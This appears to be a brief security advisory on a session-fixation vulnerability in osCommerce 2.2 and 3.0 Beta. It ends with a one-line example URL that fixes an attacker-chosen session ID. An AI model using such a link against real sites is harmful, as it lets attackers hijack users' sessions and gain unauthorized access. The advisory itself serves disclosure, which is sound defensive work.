14 lines
No EOL
409 B
Text
14 lines
No EOL
409 B
Text
source: http://www.securityfocus.com/bid/34348/info
|
|
|
|
osCommerce is prone to a session-fixation vulnerability.
|
|
|
|
Attackers can exploit this issue to hijack a user's session and gain unauthorized access to the affected application.
|
|
|
|
The following are vulnerable:
|
|
|
|
osCommerce 2.2
|
|
osCommerce 3.0 Beta
|
|
|
|
Other versions may also be affected.
|
|
|
|
http://www.example.com/myapp/index.php?oscid=arbitrarysession |